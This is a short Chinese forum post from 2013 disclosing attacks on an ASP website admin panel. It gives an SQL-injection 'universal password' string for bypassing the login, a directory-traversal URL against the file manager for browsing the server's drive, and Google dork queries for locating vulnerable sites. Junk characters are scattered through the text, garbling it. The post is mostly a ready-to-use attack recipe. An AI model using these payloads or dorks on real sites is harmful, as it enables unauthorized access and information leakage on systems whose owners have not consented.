后台万能密码 'or'='or'
2 r9 ^" r" A0 I; B# i8 }, ^9 t; _0 [ b+ B
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
0 A- \ z9 g, }admin/uploadfile.asp?currentFolder=/upfiles/../
) b; J$ r9 t6 k3 Z/ Z9 k3 I8 |
9 T! L/ \6 J/ f6 x7 a漏洞证明:; [; ?; |( h& ^2 ` a$ e; {
- I, ? f5 _% n谷歌:inurl:type.asp?id=1 新闻中心% j, h; R( L2 h4 x9 v7 p7 X
或者 :inurl:download_ok.asp?
$ o( O, b! ? O8 M: S2 w' Q9 q% e9 f8 s5 \6 B
|
发表于 2013-3-14 20:17:32
收藏
支持
反对